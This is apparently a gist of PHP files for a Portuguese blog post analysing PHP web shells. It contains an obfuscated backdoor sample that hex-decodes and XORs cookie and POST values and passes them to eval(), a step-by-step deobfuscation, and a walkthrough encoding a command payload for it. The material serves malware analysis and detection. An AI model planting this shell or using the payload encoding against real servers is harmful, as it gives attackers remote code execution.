@mdjunior
Last active September 23, 2019 02:10
Arquivos utilizados para o post Analisando shells em PHP no Medium
<?php
// Encoding walkthrough, step 1: build the list that holds the function name
// and its argument. This reproduces, for analysis, the data layout that the
// sample studied in this gist expects after decoding.
// (
// [0] =>
// [1] => exec
// [2] => ls -lah
// )
$cmd = Array();
// Filler entry: the analysed sample only acts on a list whose element count
// is a multiple of 3 (see its count(...) % 3 check).
$cmd[0] = " ";
// Entry 1 is used by the sample as a function name, entry 2 as its argument.
$cmd[1] = "exec";
$cmd[2] = "ls -lah";
?>
<?php
// Encoding walkthrough, step 2: build the list, then flatten it into one
// '#'-delimited string.
// (
// [0] =>
// [1] => exec
// [2] => ls -lah
// )
$cmd = Array();
// Filler entry: the analysed sample only acts on a list whose element count
// is a multiple of 3.
$cmd[0] = " ";
$cmd[1] = "exec";
$cmd[2] = "ls -lah";
// Serialise the list into a single string; '#' is the separator the sample
// later splits on with explode().
// " #exec#ls -lah"
$cmd_string = implode("#", $cmd);
?>
<?php
// Encoding walkthrough, step 3: build the list, flatten it, then XOR it with
// a repeated-character key.
// (
// [0] =>
// [1] => exec
// [2] => ls -lah
// )
$cmd = Array();
// Filler entry: the analysed sample only acts on a list whose element count
// is a multiple of 3.
$cmd[0] = " ";
$cmd[1] = "exec";
$cmd[2] = "ls -lah";
// Serialise the list into a single '#'-delimited string.
// " #exec#ls -lah"
$cmd_string = implode("#", $cmd);
// XOR against a key made of repeated "1" characters. The key is built twice
// as long as the data, but PHP's string ^ stops at the shorter operand, so
// the result has strlen($cmd_string) bytes.
$valor_xor = str_repeat("1", strlen($cmd_string)*2); // 1111111111111111111111111111
// The quoted value below shows only the printable bytes; the result also
// contains 0x11, 0x12 and 0x1c, which do not display.
$cmd_xor = $cmd_string ^ $valor_xor; // "TITR]B]PY"
?>
<?php
// Encoding walkthrough, step 4: build the list, flatten it, XOR it, then
// hex-encode the XORed bytes.
// (
// [0] =>
// [1] => exec
// [2] => ls -lah
// )
$cmd = Array();
// Filler entry: the analysed sample only acts on a list whose element count
// is a multiple of 3.
$cmd[0] = " ";
$cmd[1] = "exec";
$cmd[2] = "ls -lah";
// Serialise the list into a single '#'-delimited string.
// " #exec#ls -lah"
$cmd_string = implode("#", $cmd);
// XOR against a key of repeated "1" characters; PHP's string ^ stops at the
// shorter operand, so only the first strlen($cmd_string) key bytes are used.
$valor_xor = str_repeat("1", strlen($cmd_string)*2); // 1111111111111111111111111111
// Printable bytes only; 0x11, 0x12 and 0x1c are also present in the result.
$cmd_xor = $cmd_string ^ $valor_xor; // "TITR]B]PY"
// Hex-encode the XORed bytes. unpack("H*", ...) returns an array whose
// element 1 holds the hex string; this is the inverse of the pack("H*", ...)
// call in the sample.
// (
// [1] => 111254495452125d42111c5d5059
// )
$cmd_unpack = unpack("H*", $cmd_xor);
?>
<?php
// Encoding walkthrough, final step: build the list, flatten it, XOR it,
// hex-encode it, and name the resulting key/value pair.
// (
// [0] =>
// [1] => exec
// [2] => ls -lah
// )
$cmd = Array();
// Filler entry: the analysed sample only acts on a list whose element count
// is a multiple of 3.
$cmd[0] = " ";
$cmd[1] = "exec";
$cmd[2] = "ls -lah";
// Serialise the list into a single '#'-delimited string.
// " #exec#ls -lah"
$cmd_string = implode("#", $cmd);
// XOR against a key of repeated "1" characters; PHP's string ^ stops at the
// shorter operand, so only the first strlen($cmd_string) key bytes are used.
$valor_xor = str_repeat("1", strlen($cmd_string)*2); // 1111111111111111111111111111
// Printable bytes only; 0x11, 0x12 and 0x1c are also present in the result.
$cmd_xor = $cmd_string ^ $valor_xor; // "TITR]B]PY"
// Hex-encode the XORed bytes; element 1 of the returned array is the hex string.
// (
// [1] => 111254495452125d42111c5d5059
// )
$cmd_unpack = unpack("H*", $cmd_xor);
// Key/value pair, written as key: value. $chave (key) and $valor (value) use
// the same names as the loop variables in the deobfuscated sample.
// 1111111111111111111111111111: 111254495452125d42111c5d5059
$chave = $valor_xor;
$valor = $cmd_unpack[1];
?>
<?php
// Sample under analysis, kept as a single line. Do not load this file through a PHP
// interpreter on a production host; treat it as a specimen.
//
// Structure visible in the line below:
//   1. $zsyez is a lookup string; $ncpkd is filled with strings assembled one character
//      at a time from it. Indexing the lookup string by hand gives:
//      [0] "H*"  [1] "#"  [2] "0f3073de-9bf5-4d90-a0fb-66fc3fd79e1e"  [3] "count"
//      [4] "str_repeat"  [5] "explode"  [6] "substr"  [7] "array_merge"  [8] "strlen"
//      [9] "pack"
//   2. Those strings are then called as functions ($ncpkd[7](...) and so on), which keeps
//      the real function names out of the source text.
//   3. The loop walks the merged $_COOKIE and $_POST arrays, hex-decodes each value,
//      XORs it with a string derived from the parameter name and the constant in [2],
//      splits the result on "#", and, when the element count is a multiple of 3,
//      calls element 1 as a function on element 2 and passes the result to eval().
//
// Indicators a reviewer can search for: eval() fed by a variable-function call, request
// superglobals passed to a function whose name is built at run time, @ error
// suppression, and a long run of single-character string-index concatenations.
$zsyez = '6re5#yH9bgtiokfdp-1*calm\'x30s_uvn47';$ncpkd = Array();$ncpkd[] = $zsyez[6].$zsyez[19];$ncpkd[] = $zsyez[4];$ncpkd[] = $zsyez[27].$zsyez[14].$zsyez[26].$zsyez[27].$zsyez[34].$zsyez[26].$zsyez[15].$zsyez[2].$zsyez[17].$zsyez[7].$zsyez[8].$zsyez[14].$zsyez[3].$zsyez[17].$zsyez[33].$zsyez[15].$zsyez[7].$zsyez[27].$zsyez[17].$zsyez[21].$zsyez[27].$zsyez[14].$zsyez[8].$zsyez[17].$zsyez[0].$zsyez[0].$zsyez[14].$zsyez[20].$zsyez[26].$zsyez[14].$zsyez[15].$zsyez[34].$zsyez[7].$zsyez[2].$zsyez[18].$zsyez[2];$ncpkd[] = $zsyez[20].$zsyez[12].$zsyez[30].$zsyez[32].$zsyez[10];$ncpkd[] = $zsyez[28].$zsyez[10].$zsyez[1].$zsyez[29].$zsyez[1].$zsyez[2].$zsyez[16].$zsyez[2].$zsyez[21].$zsyez[10];$ncpkd[] = $zsyez[2].$zsyez[25].$zsyez[16].$zsyez[22].$zsyez[12].$zsyez[15].$zsyez[2];$ncpkd[] = $zsyez[28].$zsyez[30].$zsyez[8].$zsyez[28].$zsyez[10].$zsyez[1];$ncpkd[] = $zsyez[21].$zsyez[1].$zsyez[1].$zsyez[21].$zsyez[5].$zsyez[29].$zsyez[23].$zsyez[2].$zsyez[1].$zsyez[9].$zsyez[2];$ncpkd[] = $zsyez[28].$zsyez[10].$zsyez[1].$zsyez[22].$zsyez[2].$zsyez[32];$ncpkd[] = $zsyez[16].$zsyez[21].$zsyez[20].$zsyez[13];foreach ($ncpkd[7]($_COOKIE, $_POST) as $fxzcvcv => $peidoza){function vvuoh($ncpkd, $fxzcvcv, $tjplicn){return $ncpkd[6]($ncpkd[4]($fxzcvcv . $ncpkd[2], ($tjplicn / $ncpkd[8]($fxzcvcv)) + 1), 0, $tjplicn);}function hrxaikq($ncpkd, $jjyrjmu){return @$ncpkd[9]($ncpkd[0], $jjyrjmu);}function vbiavuf($ncpkd, $jjyrjmu){$ptdzumj = $ncpkd[3]($jjyrjmu) % 3;if (!$ptdzumj) {eval($jjyrjmu[1]($jjyrjmu[2]));exit();}}$peidoza = hrxaikq($ncpkd, $peidoza);vbiavuf($ncpkd, $ncpkd[5]($ncpkd[1], $peidoza ^ vvuoh($ncpkd, $fxzcvcv, $ncpkd[8]($peidoza))));}
// https://www.tehplayground.com/hlQEmHR1EFjVn75r
<?php
// Deobfuscation step: keep only the string-building half of the sample and
// print the resulting table. The request-handling loop and eval() are left
// out, so this snippet only performs string indexing and print_r().
// Lookup string that every entry below is assembled from, one character at a time.
$zsyez = '6re5#yH9bgtiokfdp-1*calm\'x30s_uvn47';
$ncpkd = Array();
// [0] "H*"  (format code later handed to pack)
$ncpkd[] = $zsyez[6] . $zsyez[19];
// [1] "#"  (separator later handed to explode)
$ncpkd[] = $zsyez[4];
// [2] "0f3073de-9bf5-4d90-a0fb-66fc3fd79e1e"  (constant appended to the key material)
$ncpkd[] = $zsyez[27] . $zsyez[14] . $zsyez[26] . $zsyez[27] . $zsyez[34] . $zsyez[26] . $zsyez[15] . $zsyez[2] . $zsyez[17] . $zsyez[7] . $zsyez[8] . $zsyez[14] . $zsyez[3] . $zsyez[17] . $zsyez[33] . $zsyez[15] . $zsyez[7] . $zsyez[27] . $zsyez[17] . $zsyez[21] . $zsyez[27] . $zsyez[14] . $zsyez[8] . $zsyez[17] . $zsyez[0] . $zsyez[0] . $zsyez[14] . $zsyez[20] . $zsyez[26] . $zsyez[14] . $zsyez[15] . $zsyez[34] . $zsyez[7] . $zsyez[2] . $zsyez[18] . $zsyez[2];
// [3] "count"
$ncpkd[] = $zsyez[20] . $zsyez[12] . $zsyez[30] . $zsyez[32] . $zsyez[10];
// [4] "str_repeat"
$ncpkd[] = $zsyez[28] . $zsyez[10] . $zsyez[1] . $zsyez[29] . $zsyez[1] . $zsyez[2] . $zsyez[16] . $zsyez[2] . $zsyez[21] . $zsyez[10];
// [5] "explode"
$ncpkd[] = $zsyez[2] . $zsyez[25] . $zsyez[16] . $zsyez[22] . $zsyez[12] . $zsyez[15] . $zsyez[2];
// [6] "substr"
$ncpkd[] = $zsyez[28] . $zsyez[30] . $zsyez[8] . $zsyez[28] . $zsyez[10] . $zsyez[1];
// [7] "array_merge"
$ncpkd[] = $zsyez[21] . $zsyez[1] . $zsyez[1] . $zsyez[21] . $zsyez[5] . $zsyez[29] . $zsyez[23] . $zsyez[2] . $zsyez[1] . $zsyez[9] . $zsyez[2];
// [8] "strlen"
$ncpkd[] = $zsyez[28] . $zsyez[10] . $zsyez[1] . $zsyez[22] . $zsyez[2] . $zsyez[32];
// [9] "pack"
$ncpkd[] = $zsyez[16] . $zsyez[21] . $zsyez[20] . $zsyez[13];
// Dump the decoded table so each $ncpkd[n] in the sample can be replaced by name.
print_r($ncpkd);
?>
<?php
// Deobfuscation step: the complete sample, reformatted one statement per
// line. The logic is unchanged from the single-line original, so this file
// is still live code and should be handled as a specimen.
// Lookup string that the table below is assembled from.
$zsyez = '6re5#yH9bgtiokfdp-1*calm\'x30s_uvn47';
$ncpkd = Array();
// [0] "H*"
$ncpkd[] = $zsyez[6] . $zsyez[19];
// [1] "#"
$ncpkd[] = $zsyez[4];
// [2] "0f3073de-9bf5-4d90-a0fb-66fc3fd79e1e"
$ncpkd[] = $zsyez[27] . $zsyez[14] . $zsyez[26] . $zsyez[27] . $zsyez[34] . $zsyez[26] . $zsyez[15] . $zsyez[2] . $zsyez[17] . $zsyez[7] . $zsyez[8] . $zsyez[14] . $zsyez[3] . $zsyez[17] . $zsyez[33] . $zsyez[15] . $zsyez[7] . $zsyez[27] . $zsyez[17] . $zsyez[21] . $zsyez[27] . $zsyez[14] . $zsyez[8] . $zsyez[17] . $zsyez[0] . $zsyez[0] . $zsyez[14] . $zsyez[20] . $zsyez[26] . $zsyez[14] . $zsyez[15] . $zsyez[34] . $zsyez[7] . $zsyez[2] . $zsyez[18] . $zsyez[2];
// [3] "count"
$ncpkd[] = $zsyez[20] . $zsyez[12] . $zsyez[30] . $zsyez[32] . $zsyez[10];
// [4] "str_repeat"
$ncpkd[] = $zsyez[28] . $zsyez[10] . $zsyez[1] . $zsyez[29] . $zsyez[1] . $zsyez[2] . $zsyez[16] . $zsyez[2] . $zsyez[21] . $zsyez[10];
// [5] "explode"
$ncpkd[] = $zsyez[2] . $zsyez[25] . $zsyez[16] . $zsyez[22] . $zsyez[12] . $zsyez[15] . $zsyez[2];
// [6] "substr"
$ncpkd[] = $zsyez[28] . $zsyez[30] . $zsyez[8] . $zsyez[28] . $zsyez[10] . $zsyez[1];
// [7] "array_merge"
$ncpkd[] = $zsyez[21] . $zsyez[1] . $zsyez[1] . $zsyez[21] . $zsyez[5] . $zsyez[29] . $zsyez[23] . $zsyez[2] . $zsyez[1] . $zsyez[9] . $zsyez[2];
// [8] "strlen"
$ncpkd[] = $zsyez[28] . $zsyez[10] . $zsyez[1] . $zsyez[22] . $zsyez[2] . $zsyez[32];
// [9] "pack"
$ncpkd[] = $zsyez[16] . $zsyez[21] . $zsyez[20] . $zsyez[13];
// $ncpkd[7] is "array_merge": every cookie and POST field of the request is
// walked as name ($fxzcvcv) => value ($peidoza).
foreach ($ncpkd[7]($_COOKIE, $_POST) as $fxzcvcv => $peidoza) {
// The three functions are declared inside the loop body, so PHP defines them
// when the body first runs; reaching the body a second time raises a
// "cannot redeclare" fatal error. Such errors for random-looking function
// names in the PHP error log are a useful indicator of this family.
// vvuoh: builds the XOR key. It repeats (name . $ncpkd[2]) via $ncpkd[4]
// ("str_repeat") and trims it to $tjplicn bytes via $ncpkd[6] ("substr").
function vvuoh($ncpkd, $fxzcvcv, $tjplicn) {
return $ncpkd[6]($ncpkd[4]($fxzcvcv . $ncpkd[2], ($tjplicn / $ncpkd[8]($fxzcvcv)) + 1), 0, $tjplicn);
}
// hrxaikq: $ncpkd[9]("H*", value), i.e. pack() turning a hex string into
// raw bytes. The @ silences any warning the call raises.
function hrxaikq($ncpkd, $jjyrjmu) {
return @$ncpkd[9]($ncpkd[0], $jjyrjmu);
}
// vbiavuf: the execution sink. $ncpkd[3] is "count"; when the element count
// is a multiple of 3, element 1 is called as a function with element 2 as
// its argument, the return value is passed to eval(), and the script exits.
function vbiavuf($ncpkd, $jjyrjmu) {
$ptdzumj = $ncpkd[3]($jjyrjmu) % 3;
if (!$ptdzumj) {
eval($jjyrjmu[1]($jjyrjmu[2]));
exit();
}
}
// Hex-decode the parameter value.
$peidoza = hrxaikq($ncpkd, $peidoza);
// XOR the decoded bytes with the derived key, split on $ncpkd[1] ("#") via
// $ncpkd[5] ("explode"), and hand the list to the sink.
vbiavuf($ncpkd, $ncpkd[5]($ncpkd[1], $peidoza ^ vvuoh($ncpkd, $fxzcvcv, $ncpkd[8]($peidoza))));
} ?>
<?php
// Deobfuscation step: every $ncpkd[n] lookup has been replaced by the string
// it decodes to, so the real function names are now visible. Variable and
// function names are still the sample's random ones.
// NOTE(review): $ncpkd is no longer defined in this snippet; it is still
// passed to each function but none of the bodies reads it.
// Walk every cookie and POST field as name ($fxzcvcv) => value ($peidoza).
foreach (array_merge($_COOKIE, $_POST) as $fxzcvcv => $peidoza) {
// vvuoh: derives the XOR key by repeating (name . fixed constant) and
// trimming it to $tjplicn bytes.
function vvuoh($ncpkd, $fxzcvcv, $tjplicn) {
return substr(str_repeat($fxzcvcv . "0f3073de-9bf5-4d90-a0fb-66fc3fd79e1e", ($tjplicn / strlen($fxzcvcv)) + 1), 0, $tjplicn);
}
// hrxaikq: hex string -> raw bytes; @ hides the warning pack() raises on
// input that is not valid hex.
function hrxaikq($ncpkd, $jjyrjmu) {
return @pack("H*", $jjyrjmu);
}
// vbiavuf: execution sink. Acts only when the list length is a multiple of
// 3, then calls element 1 as a function on element 2, evals the result and
// exits.
function vbiavuf($ncpkd, $jjyrjmu) {
$ptdzumj = count($jjyrjmu) % 3;
if (!$ptdzumj) {
eval($jjyrjmu[1]($jjyrjmu[2]));
exit();
}
}
// Hex-decode the value, XOR it with the derived key, split on "#".
$peidoza = hrxaikq($ncpkd, $peidoza);
vbiavuf($ncpkd, explode("#", $peidoza ^ vvuoh($ncpkd, $fxzcvcv, strlen($peidoza))));
} ?>
<?php
// Deobfuscation step: the loop variables are renamed to $chave (key) and
// $valor (value), and the hex helper is renamed to decode_hex. Behaviour is
// otherwise the same as the previous step.
// NOTE(review): $ncpkd is undefined here and unused by the function bodies.
foreach (array_merge($_COOKIE, $_POST) as $chave => $valor) {
// vvuoh: derives the XOR key by repeating (parameter name . fixed constant)
// and trimming it to $tjplicn bytes.
function vvuoh($ncpkd, $chave, $tjplicn) {
return substr(str_repeat($chave . "0f3073de-9bf5-4d90-a0fb-66fc3fd79e1e", ($tjplicn / strlen($chave)) + 1), 0, $tjplicn);
}
// decode_hex: hex string -> raw bytes, with warnings suppressed by @.
function decode_hex($ncpkd, $jjyrjmu) {
return @pack("H*", $jjyrjmu);
}
// vbiavuf: execution sink. When the list length is a multiple of 3 it calls
// element 1 as a function on element 2, evals the result and exits.
function vbiavuf($ncpkd, $jjyrjmu) {
$ptdzumj = count($jjyrjmu) % 3;
if (!$ptdzumj) {
eval($jjyrjmu[1]($jjyrjmu[2]));
exit();
}
}
// Hex-decode the value, XOR it with the derived key, split on "#".
$valor = decode_hex($ncpkd, $valor);
vbiavuf($ncpkd, explode("#", $valor ^ vvuoh($ncpkd, $chave, strlen($valor))));
} ?>
<?php
// Deobfuscation step: only the loop variables are renamed, to $chave (key)
// and $valor (value); the three functions keep the sample's random names.
// NOTE(review): $ncpkd is undefined here and unused by the function bodies.
foreach (array_merge($_COOKIE, $_POST) as $chave => $valor) {
// vvuoh: derives the XOR key by repeating (parameter name . fixed constant)
// and trimming it to $tjplicn bytes.
function vvuoh($ncpkd, $chave, $tjplicn) {
return substr(str_repeat($chave . "0f3073de-9bf5-4d90-a0fb-66fc3fd79e1e", ($tjplicn / strlen($chave)) + 1), 0, $tjplicn);
}
// hrxaikq: hex string -> raw bytes, with warnings suppressed by @.
function hrxaikq($ncpkd, $jjyrjmu) {
return @pack("H*", $jjyrjmu);
}
// vbiavuf: execution sink. When the list length is a multiple of 3 it calls
// element 1 as a function on element 2, evals the result and exits.
function vbiavuf($ncpkd, $jjyrjmu) {
$ptdzumj = count($jjyrjmu) % 3;
if (!$ptdzumj) {
eval($jjyrjmu[1]($jjyrjmu[2]));
exit();
}
}
// Hex-decode the value, XOR it with the derived key, split on "#".
$valor = hrxaikq($ncpkd, $valor);
vbiavuf($ncpkd, explode("#", $valor ^ vvuoh($ncpkd, $chave, strlen($valor))));
} ?>
<?php
// Deobfuscation step: the key-derivation helper is renamed to corta_chave
// ("cut key") and simplified.
// NOTE(review): this version drops the str_repeat() of the earlier steps, so
// it matches the original sample only when the parameter name plus the
// constant is at least as long as the decoded value. Keep the earlier form
// when writing a decoder for captured traffic.
// NOTE(review): $ncpkd is undefined here and unused by the function bodies.
foreach (array_merge($_COOKIE, $_POST) as $chave => $valor) {
// corta_chave: first $valor_tamanho bytes of (parameter name . constant).
function corta_chave($ncpkd, $chave, $valor_tamanho) {
return substr($chave . "0f3073de-9bf5-4d90-a0fb-66fc3fd79e1e", 0, $valor_tamanho);
}
// decode_hex: hex string -> raw bytes, with warnings suppressed by @.
function decode_hex($ncpkd, $codificado) {
return @pack("H*", $codificado);
}
// vbiavuf: execution sink. When the list length is a multiple of 3 it calls
// element 1 as a function on element 2, evals the result and exits.
function vbiavuf($ncpkd, $jjyrjmu) {
$ptdzumj = count($jjyrjmu) % 3;
if (!$ptdzumj) {
eval($jjyrjmu[1]($jjyrjmu[2]));
exit();
}
}
// Hex-decode the value, XOR it with the trimmed key, split on "#".
$valor = decode_hex($ncpkd, $valor);
vbiavuf($ncpkd, explode("#", $valor ^ corta_chave($ncpkd, $chave, strlen($valor))));
} ?>
<?php
// Deobfuscation step: the key-derivation helper is removed and the value is
// XORed with the parameter name directly.
// NOTE(review): PHP's string ^ stops at the shorter operand, so this equals
// the original sample only when the parameter name is at least as long as
// the decoded value; the original also appends a fixed constant and repeats
// the key. Treat this as a reading aid, not an exact equivalent.
// NOTE(review): $ncpkd is undefined here and unused by the function bodies.
foreach (array_merge($_COOKIE, $_POST) as $chave => $valor) {
// decode_hex: hex string -> raw bytes, with warnings suppressed by @.
function decode_hex($ncpkd, $codificado) {
return @pack("H*", $codificado);
}
// vbiavuf: execution sink. When the list length is a multiple of 3 it calls
// element 1 as a function on element 2, evals the result and exits.
function vbiavuf($ncpkd, $jjyrjmu) {
$ptdzumj = count($jjyrjmu) % 3;
if (!$ptdzumj) {
eval($jjyrjmu[1]($jjyrjmu[2]));
exit();
}
}
// Hex-decode the value, XOR it with the parameter name, split on "#".
$valor = decode_hex($ncpkd, $valor);
vbiavuf($ncpkd, explode("#", $valor ^ $chave));
} ?>
<?php
// Final deobfuscation step: all names are readable. In short, each request
// parameter is hex-decoded, XORed with its own name, split on "#", and, if
// the list length is a multiple of 3, used to call a named function whose
// result goes to eval().
// NOTE(review): `$valor ^ $chave` is a simplification; the original sample
// appends a fixed constant to the parameter name and repeats it before
// XORing, so the two agree only when the name is at least as long as the
// decoded value.
// NOTE(review): $ncpkd is undefined here and unused by the function bodies.
// Detection notes: the functions are declared inside the loop body, so a
// second pass raises a "cannot redeclare" fatal error that should appear in
// the PHP error log; eval() on the result of a request-controlled variable
// function is the pattern to alert on in code scanning.
foreach (array_merge($_COOKIE, $_POST) as $chave => $valor) {
// decode_hex: hex string -> raw bytes, with warnings suppressed by @.
function decode_hex($ncpkd, $codificado) {
return @pack("H*", $codificado);
}
// run: execution sink. $cmd_lista[1] is used as a function name and
// $cmd_lista[2] as its argument; the return value is evaluated as PHP code.
function run($ncpkd, $cmd_lista) {
// Proceed only when the list length is a multiple of 3.
$mod_resultado = count($cmd_lista) % 3;
if (!$mod_resultado) {
eval($cmd_lista[1]($cmd_lista[2]));
exit();
}
}
// Hex-decode the value, XOR it with the parameter name, split on "#".
$valor = decode_hex($ncpkd, $valor);
run($ncpkd, explode("#", $valor ^ $chave));
} ?>